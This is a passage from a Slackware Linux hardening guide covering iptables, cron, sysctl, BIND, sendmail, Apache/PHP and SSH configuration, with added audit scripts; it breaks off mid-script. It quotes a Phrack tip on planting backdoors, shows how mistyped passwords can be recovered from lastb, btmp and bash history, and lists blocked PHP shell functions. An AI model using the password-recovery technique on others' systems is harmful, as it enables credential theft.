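iptables-restore. It assumes the 192.168.1.0/24 LAN used elsewhere on this
page, eth0, sshd on port 22 and that rc.inet2 calls the script with "start";
LAN, IFACE and SSH_PORT are placeholders to adjust.

```shell
#!/bin/sh
# /etc/rc.d/rc.firewall - a default-deny host firewall for rc.inet2 to run.
# Added example, not from the original document. LAN, IFACE and SSH_PORT are
# assumptions; adjust them for the host.
LAN=192.168.1.0/24
IFACE=eth0
SSH_PORT=22
IPT=/usr/sbin/iptables

# Emit the whole ruleset in iptables-restore format so it is loaded
# atomically: there is never a window with the policy open and no rules.
firewall_rules() {
    cat <<EOF
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
:LOGDROP - [0:0]
# loopback, and replies to connections this host opened
-A INPUT -i lo -j ACCEPT
-A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
-A INPUT -m state --state INVALID -j LOGDROP
# packets on the LAN interface claiming a loopback source are spoofed
-A INPUT -i $IFACE -s 127.0.0.0/8 -j LOGDROP
# ssh from the LAN only; TCP Wrappers (hosts.allow) still apply on top
-A INPUT -i $IFACE -p tcp -s $LAN --dport $SSH_PORT -m state --state NEW -j ACCEPT
# ping from the LAN (moot while icmp_echo_ignore_all=1 is set in sysctl.conf)
-A INPUT -i $IFACE -p icmp -s $LAN --icmp-type echo-request -j ACCEPT
# everything else is logged, rate limited, then dropped
-A INPUT -j LOGDROP
-A LOGDROP -m limit --limit 5/min --limit-burst 10 -j LOG --log-prefix "rc.firewall drop: " --log-level 4
-A LOGDROP -j DROP
COMMIT
EOF
}

case "${1:-}" in
    start|restart)
        firewall_rules | ${IPT}-restore
        ;;
    stop)
        # open up: default ACCEPT, flush the rules, delete our chain
        $IPT -P INPUT ACCEPT; $IPT -P FORWARD ACCEPT
        $IPT -F; $IPT -X
        ;;
    show)
        firewall_rules
        ;;
esac
```

`/etc/rc.d/rc.firewall show` prints the ruleset without loading it, which is
the thing to review before the first `start`; remember the script has to be
executable (chmod 700) for rc.inet2 to pick it up.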
----[ Cron ]----
/etc/cron.daily/ntpdate:
#!/bin/sh
/usr/sbin/ntpdate clock.via.net && /sbin/hwclock --systohc
root@darkstar:~# chmod 700 /etc/cron.daily/ntpdate
/etc/cron.daily/cleanup:
#!/bin/sh
# -type f keeps rm away from sockets and directories (e.g. /tmp/.X11-unix);
# note the first line removes any regular file named "core", not only dumps
/usr/bin/find / -type f -name core -exec /bin/rm -f {} \;
/usr/bin/find /tmp /var/tmp -xdev -type f -atime +7 -exec /bin/rm -f {} \;
root@darkstar:~# chmod 700 /etc/cron.daily/cleanup
/etc/cron.daily/paranoid:
#!/bin/sh
/bin/chmod -R go-rwx /home/dentonj
/bin/chmod -R go-rwx /root
/bin/chmod -R o-rwx /var/log
/bin/rm -f /home/dentonj/dead.letter
root@darkstar:~# chmod 700 /etc/cron.daily/paranoid
/var/spool/cron/crontabs/root:
0 3 * * * /usr/bin/find /home \( -name .rhosts -o -name .forward \) -ls
The parentheses matter: without them -ls binds only to -name .forward and
any .rhosts files are silently not listed. Cron should mail the results to
root.
root@darkstar:~# crontab -l
root@darkstar:~# crontab -e
man crond
man crontab
/etc/at.allow:
root@darkstar:~# rm /etc/at.deny
root@darkstar:~# touch /etc/at.allow
Don't allow anyone to use at.
Even better, remove at from the system:
root@darkstar:~# removepkg at
man at
----[ Bash ]----
~/.bash_history:
Set the history file so that it can only be appended and not erased by a
user. Bash must also be told to append (shopt -s histappend in /etc/profile
or the user's .bashrc): its default is to rewrite the file on exit, which
the +a attribute refuses, leaving no history saved at all. Even then this
only stops truncation; the user can avoid writing history entirely
(HISTFILE=/dev/null, unset HISTFILE, or kill -9 on the shell), so treat it
as a convenience, not an audit log.
root@darkstar:~# chattr +a /home/dentonj/.bash_history
root@darkstar:~# chmod go-wrx /usr/bin/chattr /usr/bin/lsattr
man chattr
man lsattr
man chmod
~/.bash_profile:
trap 'test -n "$SSH_AGENT_PID" && eval `/usr/bin/ssh-agent -k`' 0
----[ Kernel ]----
/etc/sysctl.conf:
# vm.bdflush, vm.kswapd and vm.pagetable_cache were 2.4 tunables and do not
# exist on the 2.6.33 kernel of Slackware 13.1; sysctl -p reports an error
# for each unknown key, so they are left commented out here.
#vm.bdflush = 60 64 64 256 500 300 80 0 0
#vm.kswapd = 512 32 32
# Enables/Disables memory over commitment
vm.overcommit_memory = 0
#vm.pagetable_cache = 25 50
# Limit of file-handles. 2.6 sizes this from RAM at boot, usually well above
# 8192; check `sysctl fs.file-max` first and never set it lower than that.
fs.file-max = 8192
# Enable/Disable ignoring ping request
net.ipv4.icmp_echo_ignore_all = 1
# Enable/Disable ignoring broadcasts request
net.ipv4.icmp_ignore_broadcasts = 1
# Enable/Disable IP source routing
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.default.accept_source_route = 0
# Enable/Disable TCP SYN cookie protection
net.ipv4.tcp_syncookies = 1
# Enable/Disable ICMP redirect acceptance
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.default.accept_redirects = 0
# Enable/Disable bad error message protection
net.ipv4.icmp_ignore_bogus_error_responses = 1
# Reverse path filtering (IP spoofing protection): 1 = strict, 2 = loose.
# Loose only rejects sources that are not routable through any interface;
# on a single-homed host use 1.
net.ipv4.conf.all.rp_filter = 2
net.ipv4.conf.default.rp_filter = 2
# Enable/Disable logging of spoofed, source routed and redirect packets
net.ipv4.conf.all.log_martians = 1
net.ipv4.conf.default.log_martians = 1
# Shared memory: shmmax is in bytes, shmall is in pages
kernel.shmall = 134217728
kernel.shmmax = 134217728
# Default and maximum socket buffer sizes (the net.core.vmem_* keys that
# used to be here do not exist; rmem/wmem are the real names)
net.core.rmem_max = 2048000
net.core.wmem_max = 2048000
net.core.rmem_default = 204800
net.core.wmem_default = 204800
# Disable packet forwarding (this host is not a router)
net.ipv4.ip_forward = 0
# Change the default TTL to help obscure OS fingerprinting
net.ipv4.ip_default_ttl = 128
root@darkstar:~# sysctl -p /etc/sysctl.conf
root@darkstar:~# sysctl -A
There is already an entry in /etc/rc.d/rc.S that loads the settings in this
file during bootup.
man sysctl
man sysctl.conf
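Several keys that used to be in this file only existed on 2.4 kernels, and a
typo in a key name (log_martions) silently does nothing. The script below is
an added example, not from the original document: it reads a sysctl.conf and
reports, for each key, whether the running kernel has it at all and whether
the live value matches. The /proc/sys root is a parameter so it can be pointed
at a constructed tree; the function names are mine.

```shell
#!/bin/sh
# sysctl_audit.sh - check a sysctl.conf against what the running kernel
# exposes under /proc/sys. Added example, not part of the original document.
# The /proc/sys root is a parameter so it can be pointed at a constructed
# tree; the conf format is the "key = value" form used above.

# Collapse runs of whitespace so "60 64" and "60<tab>64" compare equal.
_norm() { printf '%s' "$1" | tr -s '[:space:]' ' ' | sed 's/^ //; s/ $//'; }

# Usage: sysctl_audit /etc/sysctl.conf [/proc/sys]
# Prints one line per key: "OK key", "DIFF key want=.. have=.." when the
# running value differs, or "MISSING key" when the kernel has no such
# parameter (the fate of 2.4-era keys such as vm.bdflush on a 2.6 kernel).
# Returns 1 if any key was not OK.
sysctl_audit() {
    conf=$1
    procsys=${2:-/proc/sys}
    rc=0
    # The loop reads a here-document rather than a pipe so that rc, set
    # inside it, survives in the calling shell.
    while IFS= read -r line; do
        case $line in *=*) ;; *) continue ;; esac
        key=$(printf '%s' "${line%%=*}" | tr -d '[:space:]')
        want=$(_norm "${line#*=}")
        path=$procsys/$(printf '%s' "$key" | tr . /)
        if [ ! -r "$path" ]; then
            echo "MISSING $key"
            rc=1
        else
            have=$(_norm "$(cat "$path")")
            if [ "$have" = "$want" ]; then
                echo "OK $key"
            else
                echo "DIFF $key want=$want have=$have"
                rc=1
            fi
        fi
    done <<EOF
$(sed -e 's/[#;].*//' "$conf")
EOF
    return $rc
}
```

Run `sysctl_audit /etc/sysctl.conf` after `sysctl -p`: every line that is not
OK is either a key the kernel does not know (remove it, or fix the spelling)
or a value something else changed after boot.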
/etc/rc.d/rc.modules:
List the kernel modules that are loaded during bootup. Comment out the
ones you feel are unnecessary.
root@darkstar:~# grep -v "^#\|^$" /etc/rc.d/rc.modules
Grsecurity:
TODO
Remove support for kernel modules:
From Phrack 25-5, "Unix Cracking Tips":
"After you gain superuser privileges and you wish to stay root,
here are a few suggestions for installing backdoors:
. . .
- Install new system calls
. . ."
Then read Phrack 52-8, "Weakening the Linux Kernel". Then compile your
kernel to remove support for modules.
CONFIG_MODULES=n
This only closes the module loader. With root, kernel memory can still be
patched through /dev/kmem or /dev/mem (Phrack 58-7, "Linux on-the-fly
kernel patching without LKM"), so build the kernel with CONFIG_DEVKMEM=n and
CONFIG_STRICT_DEVMEM=y as well.
----[ Misc Stuff ]----
/etc/inputrc:
set bell-style none
set mark-directories on
set mark-modified-lines on
set match-hidden-files on
set show-all-if-ambiguous on
set visible-stats on
man bash
man readline
Stuff to remove:
root@darkstar:~# removepkg nn
root@darkstar:~# removepkg slrn
root@darkstar:~# removepkg uucp
root@darkstar:~# removepkg strace
root@darkstar:~# removepkg gdb
root@darkstar:~# removepkg nc
root@darkstar:~# removepkg nmap
root@darkstar:~# removepkg at
This list should be much longer.
/etc/rc.d/rc.local:
# This is hard drive specific, your settings will vary
/usr/sbin/hdparm -c3 -a16 -W1 -u1 /dev/hdb
# Turn on NumLock
/usr/bin/setleds -D +num
Make a backup of commonly trojaned commands:
Only do this after a fresh install. Making copies of already trojaned
commands will just ruin your day. If you don't have a fresh install, copy
the commands from the "Live" CD that comes with the official version of
Slackware.
root@darkstar:~# mkdir bin
Copy the following to /root/bin:
/bin/date /bin/du
/bin/echo /bin/grep
/bin/kill /bin/killall
/bin/login /bin/ls
/bin/netstat /bin/ps
/bin/su /bin/tar
/sbin/agetty /sbin/explodepkg
/sbin/getty /sbin/ifconfig
/sbin/installpkg /sbin/makepkg
/sbin/pidof /sbin/removepkg
/sbin/upgradepkg /usr/bin/basename
/usr/bin/biff /usr/bin/chfn
/usr/bin/chsh /usr/bin/crontab
/usr/bin/dirname /usr/bin/env
/usr/bin/find /usr/bin/lsattr
/usr/bin/nail /usr/bin/passwd
/usr/bin/pstree /usr/bin/ssh
/usr/bin/top /usr/bin/traceroute
/usr/bin/write /usr/sbin/gpm
/usr/sbin/hdparm /usr/sbin/in.fingerd
/usr/sbin/in.identd /usr/sbin/in.rlogind
/usr/sbin/in.rshd /usr/sbin/in.telnetd
/usr/sbin/in.timed /usr/sbin/inetd
/usr/sbin/ipop3d /usr/sbin/named
/usr/sbin/rpcinfo /usr/sbin/sendmail
/usr/sbin/sshd /usr/sbin/syslogd
/usr/sbin/tcpd
root@darkstar:~# cd bin
root@darkstar:~/bin# md5sum * > MD5SUMS
root@darkstar:~/bin# cd
root@darkstar:~# tar zcvf bin.tar.gz ./bin
root@darkstar:~# cp bin.tar.gz /mnt/thumb
It would be a good idea to run `chattr +i ...` on all of the original files,
and to check the copies later with `md5sum -c MD5SUMS` from the thumb drive.
coreutils also provides sha256sum, which is the better choice for a new
baseline.
Passwords in logs and history files:
It's not uncommon for someone to make a mistake while logging in or
switching users and type the password in the wrong place. Be aware that
"dumpster diving" in system logs and other users history files is a common
practice by evil doers to obtain passwords. Keep this in mind when
deciding to store 6 months worth of logs or when setting HISTFILESIZE to a
$LARGENUMBER.
This is lastb output on a Slackware 11.0 system:
root@darkstar:~# lastb
P@ssw0rd1! Fri Jun 23 19:04 - 19:04 (00:00)
dentonj Fri Jun 23 19:03 - 19:03 (00:00)
The output of lastb is different in Slackware 13.1, with long usernames
being truncated.
root@darkstar:~# lastb
mysupers tty3 Sun Aug 18 15:35 - 15:35 (00:00)
dentonj tty3 Sun Aug 18 13:16 - 13:16 (00:00)
root@darkstar:~# strings /var/log/btmp | grep mysupers
mysupersecretpassword
root@darkstar:~# less /home/dentonj/.bash_history
<contents of .bash_history>
/us <-- type this to search for "us"
. . .
us -
!QAZzaq1
. . .
/etc/wgetrc:
Ignore the robots.txt file on web servers.
robots = off
----[ Program Hardening ]----
/usr/sbin/atalkd:
TODO
/etc/netatalk/atalkd.conf:
/etc/netatalk/afpd.conf:
/etc/netatalk/AppleVolumes.default:
/etc/netatalk/AppleVolumes.system:
/etc/netatalk/netatalk.conf:
/etc/netatalk/papd.conf:
man afpd
man afpd.conf
man AppleVolumes.default
man atalkd
man atalkd.conf
man netatalk.conf
man papd
/usr/sbin/named:
/etc/named.conf:
acl "allowed" {
localhost;
192.168.1.0/24;
};
// Bogon (unallocated) networks. Such lists go stale: several of these /8s
// have been allocated since this was written, so check the current IANA
// registry before using it or you will blackhole legitimate networks.
acl "denied" {
0.0.0.0/8;
1.0.0.0/8;
2.0.0.0/8;
5.0.0.0/8;
7.0.0.0/8;
10.0.0.0/8;
23.0.0.0/8;
27.0.0.0/8;
31.0.0.0/8;
36.0.0.0/8;
37.0.0.0/8;
39.0.0.0/8;
42.0.0.0/8;
49.0.0.0/8;
50.0.0.0/8;
92.0.0.0/8;
93.0.0.0/8;
94.0.0.0/8;
95.0.0.0/8;
100.0.0.0/8;
101.0.0.0/8;
102.0.0.0/8;
103.0.0.0/8;
104.0.0.0/8;
105.0.0.0/8;
106.0.0.0/8;
107.0.0.0/8;
108.0.0.0/8;
109.0.0.0/8;
110.0.0.0/8;
111.0.0.0/8;
112.0.0.0/8;
113.0.0.0/8;
114.0.0.0/8;
115.0.0.0/8;
116.0.0.0/8;
117.0.0.0/8;
118.0.0.0/8;
119.0.0.0/8;
120.0.0.0/8;
169.254.0.0/16;
172.16.0.0/12;
173.0.0.0/8;
174.0.0.0/8;
175.0.0.0/8;
176.0.0.0/8;
177.0.0.0/8;
178.0.0.0/8;
179.0.0.0/8;
180.0.0.0/8;
181.0.0.0/8;
182.0.0.0/8;
183.0.0.0/8;
184.0.0.0/8;
185.0.0.0/8;
186.0.0.0/8;
187.0.0.0/8;
192.0.2.0/24;
//192.168.0.0/16;
197.0.0.0/8;
223.0.0.0/8;
224.0.0.0/3;
};
key "rndc-key" {
algorithm hmac-md5;
secret "Thisisafakekey==";
};
controls {
inet 127.0.0.1 port 953
allow { 127.0.0.1; } keys { "rndc-key"; };
};
options {
directory "/var/named";
pid-file "/var/named/named.pid";
statistics-file "/var/named/named.stats";
memstatistics-file "/var/named/named.memstats";
dump-file "/var/named/named.dump";
zone-statistics yes;
transfer-format many-answers;
interface-interval 0;
allow-transfer { none; };
allow-query { allowed; };
allow-recursion { allowed; };
blackhole { denied; };
tcp-clients 32;
forwarders { 1.2.3.4; 5.6.7.8; };
version none;
hostname none;
rfc2308-type1 no;
};
logging {
channel default_syslog {
// a channel has exactly one destination, so no "stderr;" alongside syslog
syslog daemon;
severity info;
print-category yes;
print-severity yes;
};
channel query_log {
file "/var/log/named.queries" versions 6 size 20m;
severity info;
print-time yes;
print-category yes;
print-severity yes;
};
category default { default_syslog; };
category general { default_syslog; };
category security { default_syslog; };
category config { default_syslog; };
category resolver { default_syslog; };
category xfer-in {default_syslog; };
category xfer-out {default_syslog; };
category notify { default_syslog; };
category client { default_syslog; };
category network { default_syslog; };
category update { default_syslog; };
category update-security { default_syslog; };
category lame-servers { default_syslog; };
category queries { query_log; };
category database { default_syslog; };
category unmatched { default_syslog; };
category dispatch { default_syslog; };
category dnssec { default_syslog; };
category delegation-only { default_syslog; };
};
zone "." IN {
type hint;
file "caching-example/named.ca";
};
zone "localhost" IN {
type master;
file "caching-example/named.local";
allow-update { none; };
notify no;
};
zone "0.0.127.in-addr.arpa" IN {
type master;
file "caching-example/named.local";
allow-update { none; };
notify no;
};
/etc/rndc.conf:
key "rndc-key" {
algorithm hmac-md5;
secret "Thisisafakekey==";
};
options {
default-key "rndc-key";
default-server 127.0.0.1;
default-port 953;
};
root@darkstar:~# groupadd -g 53 named
root@darkstar:~# useradd -c "BIND" -d /var/named -g 53 -u 53 \
-s /bin/false named
root@darkstar:~# dig @a.root-servers.net . ns > \
/var/named/caching-example/named.ca
root@darkstar:~# chmod 600 /etc/named.conf
root@darkstar:~# chown named.named /etc/named.conf
root@darkstar:~# chmod 600 /etc/rndc.conf
root@darkstar:~# chown named.named /etc/rndc.conf
root@darkstar:~# chown -R named.named /var/named/
root@darkstar:~# chown named.named /var/run/named/
/etc/rc.d/rc.bind:
/usr/sbin/named -u named
To generate the keys for rndc:
root@darkstar:~# rndc-confgen -b 512
To check the configuration:
root@darkstar:~# named-checkconf -z
zone localhost/IN: loaded serial 42
zone 0.0.127.in-addr.arpa/IN: loaded serial 1997022700
root@darkstar:~# named-checkzone localhost \
/var/named/caching-example/localhost.zone
zone localhost/IN: loaded serial 42
OK
root@darkstar:~# named-checkzone 0.0.127.in-addr.arpa \
/var/named/caching-example/named.local
zone 0.0.127.in-addr.arpa/IN: loaded serial 1997022700
OK
root@darkstar:~# named-checkzone . /var/named/caching-example/named.ca
zone ./IN: has 0 SOA records
root@darkstar:~# chmod 700 /etc/rc.d/rc.bind
root@darkstar:~# /etc/rc.d/rc.bind start
root@darkstar:~# rndc status
man named
man named-checkconf
man named-checkzone
man rndc
man rndc.conf
man rndc-confgen
man lwresd
dentonj@darkstar:~$ links /usr/doc/bind-9.3.2-P1/arm/Bv9ARM.html
The above example sets up BIND as a caching only DNS server. "Explain
benefits." The problem with this setup is that you are running a daemon
that isn't entirely necessary. Unnecessary services can potentially
provide an attacker with more information than they should have or they
can provide an attacker with a way to break into your system.
Unless you are setting up a caching name server as a way
of learning how to set up and run BIND, you are better off removing BIND
from the system. One of the problems with removing the BIND package on
Slackware is that the useful commands "dig", "host", and "nslookup" will
also be removed.
root@darkstar:~# removepkg bind
TODO - Chroot
/usr/sbin/sendmail:
/etc/mail/sendmail.cf:
(sendmail.cf is generated from the .mc file by m4; edits made directly here
are lost on the next rebuild, so carry them over to the matching defines in
the .mc file from the sendmail-cf package as well.)
#O DontBlameSendmail=Safe
O MaxHopCount=25
O HelpFile=/etc/issue.net
O ForwardPath=/etc/forward
O LogLevel=15
#O DaemonPortOptions=Name=MTA
#O DaemonPortOptions=Port=587,Name=MSA,M=E
O DaemonPortOptions=Address=127.0.0.1
O ClientPortOptions=Family=inet,Address=127.0.0.1
O PrivacyOptions=goaway,noreceipts,restrictmailq,restrictqrun,
restrictexpand,noetrn,nobodyreturn
O Timeout.ident=0
O SmtpGreetingMessage=$j Unauthorized Access Prohibited.
O AllowBogusHELO=False
O UnsafeGroupWrites=True
O RrtImpliesDsn=False
$.by $j with id $i$?{tls_version}
root@darkstar:~# touch /etc/forward
$HOME/.forward:
The .forward file allows users to easily forward email. However, the
file can also be used to run a program every time an email is received.
There are several ways to disable use of the .forward file.
Set the ForwardPath option so that it points to something other than
the default. The option has to be set to something, otherwise sendmail
sets ForwardPath to $HOME/.forward.
O ForwardPath=/etc/forward
You can allow programs to be run, but restrict which ones can be run by
using smrsh.
You can disable forwarding in sendmail altogether. However, the bat
book warns that Bad Things(TM) can happen if you completely disable
forwarding. Remove the "w" flag from the line located in
/etc/mail/sendmail.cf:
Mlocal, P=/usr/bin/procmail, F=lsDFMAw5:/|@qSPfhn9, S=.....
Mlocal, P=/usr/bin/procmail, F=lsDFMA5:/|@qSPfhn9, S=.....
You can try to have root create and own the .forward file in each of
the user's home directories. But the user can move the .forward file
and create a new file.
root@darkstar:~# touch /home/dentonj/.forward
dentonj@darkstar:~$ ls -l .forward
-rw-r--r-- 1 root root 0 2001-06-27 20:17 .forward
dentonj@darkstar:~$ mv .forward .forward.moved
dentonj@darkstar:~$ ls -l .forward.moved
-rw-r--r-- 1 root root 0 2001-06-27 20:17 .forward.moved
However, making the file immutable stops this.
root@darkstar:~# touch /home/dentonj/.forward
root@darkstar:~# chattr +i /home/dentonj/.forward
root@darkstar:~# lsattr /home/dentonj/.forward
----i-------- /home/dentonj/.forward
root@darkstar:~# chmod go-rwx /usr/bin/chattr /usr/bin/lsattr
dentonj@darkstar:~$ ls -l .forward
-rw-r--r-- 1 root root 0 2001-06-27 20:19 .forward
dentonj@darkstar:~$ mv .forward .forward.moved
mv: cannot move `.forward' to `.forward.moved': Operation not permitted
/usr/sbin/smrsh:
TODO
/etc/mail/aliases:
I use to comment out most of these. Now I'm more interested if someone
actually tries to send email to any of them.
postmaster: root, dentonj
bin: root, dentonj
daemon: root, dentonj
games: root, dentonj
ingres: root, dentonj
nobody: root, dentonj
system: root, dentonj
toor: root, dentonj
uucp: root, dentonj
manager: root, dentonj
dumper: root, dentonj
webmaster: root, dentonj
abuse: root, dentonj
decode: root, dentonj
Add any additional system account present in /etc/passwd:
admin: root, dentonj
ftp: root, dentonj
mail: root, dentonj
mysql: root, dentonj
smmsp: root, dentonj
sshd: root, dentonj
root@darkstar:~# newaliases
man aliases
man newaliases
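Both the /etc/ftpusers section earlier and this one say to add every system
account present in /etc/passwd. The script below is an added example, not
from the original document: it derives that list (non-root accounts below
UID_MIN, which is 1000 in the Slackware /etc/login.defs) and prints the
entries still missing from ftpusers and from aliases. The passwd, ftpusers
and aliases paths and the alias targets are parameters, so it can be run
against copies; the function names are mine.

```shell
#!/bin/sh
# system_accounts.sh - find the system accounts the ftpusers and aliases
# sections say to list, and report which ones are still missing from those
# files. Added example, not from the original document. Assumes the
# Slackware /etc/login.defs UID_MIN of 1000; root (UID 0) is skipped because
# the shipped ftpusers already lists it and an alias for it is pointless.

# Non-root accounts with a UID below $2 (default 1000), sorted.
system_accounts() {
    awk -F: -v max="${2:-1000}" '$3 > 0 && $3 < max { print $1 }' "$1" \
        | LC_ALL=C sort -u
}

# System accounts from passwd $1 that have no line of their own in ftpusers $2.
ftpusers_missing() {
    system_accounts "$1" "${3:-1000}" | while IFS= read -r acct; do
        grep -qx "$acct" "$2" || echo "$acct"
    done
}

# System accounts from passwd $1 with no entry in aliases $2, printed as
# alias lines pointing at $3 (default "root, dentonj") ready to append.
aliases_missing() {
    system_accounts "$1" "${4:-1000}" | while IFS= read -r acct; do
        grep -q "^$acct:" "$2" || printf '%s: %s\n' "$acct" "${3:-root, dentonj}"
    done
}
```

Typical use: `ftpusers_missing /etc/passwd /etc/ftpusers >> /etc/ftpusers` and
`aliases_missing /etc/passwd /etc/mail/aliases >> /etc/mail/aliases` followed
by newaliases; re-run both after installing packages that add accounts.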
If you only need to run sendmail for local mail, use cron.
root@darkstar:~# /etc/rc.d/rc.sendmail stop
root@darkstar:~# chmod 600 /etc/rc.d/rc.sendmail
/etc/cron.hourly/mqueue
#!/bin/sh
/usr/sbin/sendmail -q
root@darkstar:~# chmod 700 /etc/cron.hourly/mqueue
man crond
/usr/sbin/httpd:
root@darkstar:~# groupadd -g 80 http
root@darkstar:~# useradd -u 80 -g 80 http
/etc/apache/httpd.conf:
(This is Apache 1.3 syntax. Slackware 13.1 ships Apache 2.2, where modules
are enabled with LoadModule alone, AddModule no longer exists and the logs
live in /var/log/httpd rather than /var/log/apache; the remaining directives
carry over.)
#LoadModule includes_module libexec/apache/mod_include.so
#LoadModule autoindex_module libexec/apache/mod_autoindex.so
#LoadModule speling_module libexec/apache/mod_speling.so
#LoadModule userdir_module libexec/apache/mod_userdir.so
#LoadModule anon_auth_module libexec/apache/mod_auth_anon.so
#LoadModule digest_module libexec/apache/mod_digest.so
#LoadModule proxy_module libexec/apache/mod_proxy.so
#LoadModule cern_meta_module libexec/apache/mod_cern_meta_module.so
#LoadModule usertrack_module libexec/apache/mod_usertrack.so
#LoadModule unique_id_module libexec/apache/mod_unique_id.so
#AddModule mod_includes.c
#AddModule mod_autoindex.c
#AddModule mod_speling.c
#AddModule mod_userdir.c
#AddModule mod_auth_anon.c
#AddModule mod_digest.c
#AddModule mod_proxy.c
#AddModule mod_cern_meta.c
#AddModule mod_usertrack.c
#AddModule mod_unique_id.c
User http
Group http
ServerAdmin root@localhost
<Directory "/var/www/htdocs">
Options FollowSymLinks MultiViews
UseCanonicalName Off
LogLevel info
LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %T"
CustomLog /var/log/apache/access_log combined
ServerSignature Off
ServerTokens ProductOnly
<Directory "/var/www/icons">
Options MultiViews
#Alias /manual/ "/var/www/htdocs/manual/"
#<Directory "/var/www/htdocs/manual">
# Options Indexes FollowSymLinks MultiViews
# AllowOverride None
# Order allow,deny
# Allow from all
#</Directory>
#ScriptAlias /cgi-bin/ "/var/www/cgi-bin/"
#<Directory "/var/www/cgi-bin">
# AllowOverride None
# Options None
# Order allow,deny
# Allow from all
#</Directory>
# /etc/logrotate.d/httpd:
# /var/log/apache/access_log /var/log/apache/error_log {
# create 0640 root root
# mail
[email protected]
# mailfirst
# sharedscripts
# postrotate
# /bin/kill -HUP `cat /var/run/httpd.pid \
# 2> /dev/null || true`
# endscript
# }
/etc/logrotate.d/httpd:
/var/log/httpd/*_log {
rotate 26
notifempty
size=5M
compress
delaycompress
sharedscripts
postrotate
/etc/rc.d/rc.httpd restart
endscript
dentonj@darkstar:~$ links /var/www/htdocs/manual/misc/security_tips.html
PHP:
Fortunately, PHP is disabled by default. But if you insist on letting the
script kiddies have free rein of your system, there are a few things you
can do to slow them down.
/etc/apache/httpd.conf:
Include /etc/apache/mod_php.conf
/etc/apache/php.ini:
display_errors = Off
log_errors = On
error_log = /var/log/apache/php_errors
register_globals = Off
variables_order = "ES"
expose_php = Off
allow_url_fopen = Off
open_basedir = /var/www
disable_functions = system,exec,shell_exec,eval,include,require,include_once,require_once,preg_replace
safe_mode = On
safe_mode_include_dir = /usr/php/include
safe_mode_exec_dir = /usr/php/bin
safe_mode_gid = On
safe_mode_allowed_env_vars = PHP_
safe_mode_protected_env_vars = LD_LIBRARY_PATH
root@darkstar:~# touch /var/log/apache/php_errors
root@darkstar:~# mkdir -p /usr/php/include
root@darkstar:~# mkdir /usr/php/bin
man httpd
man php
/etc/ssh/ssh_config:
# Host *
ForwardAgent no
ForwardX11 no
RhostsRSAAuthentication no
RSAAuthentication no
PasswordAuthentication yes
HostbasedAuthentication no
BatchMode no
CheckHostIP yes
AddressFamily any
ConnectTimeout 0
StrictHostKeyChecking ask
# IdentityFile ~/.ssh/identity
IdentityFile ~/.ssh/id_rsa
IdentityFile ~/.ssh/id_dsa
Port 22
Protocol 2
# Cipher 3des
# Ciphers aes256-cbc,aes256-ctr
EscapeChar ~
Compression yes
HashKnownHosts yes
EnableSSHKeysign no
LogLevel DEBUG
PubkeyAuthentication yes
ServerAliveInterval 60
ServerAliveCountMax 10
TCPKeepAlive no
UserKnownHostsFile ~/.ssh/known_hosts
/etc/ssh/sshd_config
Port 22
Protocol 2
AddressFamily inet
ListenAddress 192.168.1.2
# HostKey for protocol version 1
#HostKey /etc/ssh/ssh_host_key
# HostKeys for protocol version 2
HostKey /etc/ssh/ssh_host_rsa_key
HostKey /etc/ssh/ssh_host_dsa_key
# Lifetime and size of ephemeral version 1 server key
#KeyRegenerationInterval 1h
#ServerKeyBits 768
# Logging
# obsoletes QuietMode and FascistLogging
SyslogFacility AUTH
LogLevel DEBUG
# Authentication:
LoginGraceTime 2m
PermitRootLogin no
StrictModes yes
MaxAuthTries 6
AllowUsers dentonj@trustedhost
AllowGroups wheel
RSAAuthentication no
PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys
# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
RhostsRSAAuthentication no
# similar for protocol version 2
HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# RhostsRSAAuthentication and HostbasedAuthentication
IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
IgnoreRhosts yes
# To disable tunneled clear text passwords, change to no here!
PasswordAuthentication no
PermitEmptyPasswords no
# Change to no to disable s/key passwords
#ChallengeResponseAuthentication yes
# Kerberos options
#KerberosAuthentication no
#KerberosOrLocalPasswd yes
#KerberosTicketCleanup yes
#KerberosGetAFSToken no
# GSSAPI options
#GSSAPIAuthentication no
#GSSAPICleanupCredentials yes
#UsePAM no
AllowTcpForwarding yes
GatewayPorts no
X11Forwarding no
X11DisplayOffset 10
X11UseLocalhost yes
PrintMotd yes
PrintLastLog yes
TCPKeepAlive no
UseLogin no
UsePrivilegeSeparation yes
PermitUserEnvironment no
Compression delayed
ClientAliveInterval 60
ClientAliveCountMax 10
UseDNS yes
PidFile /var/run/sshd.pid
#MaxStartups 10
# no default banner path
Banner /etc/issue.net
# override default of no subsystems
#Subsystem sftp /usr/libexec/sftp-server
# Ciphers aes256-cbc,aes256-ctr
# login.conf(5) is not used in Slackware
ChallengeResponseAuthentication no
root@darkstar:~# chmod u-s /usr/libexec/ssh-keysign
man ssh
man sshd
man ssh_config
man sshd_config
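A check I add here for the sshd_config above (example script, not part of the original document): it reports which of the listed directives are not actually in effect, and it honours two sshd parsing rules that a plain grep misses, namely that the first uncommented occurrence of a keyword wins and that anything after a Match line applies only conditionally. The sample config in the comments is constructed.

```shell
#!/bin/sh
# Added example, not from the original document. Audits an sshd_config-style
# file against expected "Keyword value" pairs. Keywords are case-insensitive
# and may be written "Key value" or "Key=value".

# sshd_effective FILE KEYWORD -> prints the effective global value (or nothing)
sshd_effective() {
    awk -v key="$(printf '%s' "$2" | tr 'A-Z' 'a-z')" '
    {
        sub(/^[ \t]+/, "")                      # drop leading whitespace
        if ($0 ~ /^#/ || $0 ~ /^$/) next        # skip comments and blank lines
        split($0, f, "[ \t=]+")                 # "Key value" or "Key=value"
        k = tolower(f[1])
        if (k == "match") exit                  # conditional section begins
        if (k == key) { print f[2]; exit }      # first occurrence wins
    }' "$1"
}

# sshd_audit FILE "Keyword expected" ... -> prints mismatches, returns count
sshd_audit() {
    file=$1; shift
    bad=0
    for want in "$@"; do
        key=${want%% *}
        exp=${want#* }
        got=$(sshd_effective "$file" "$key")
        if [ "$(printf '%s' "$got" | tr 'A-Z' 'a-z')" != \
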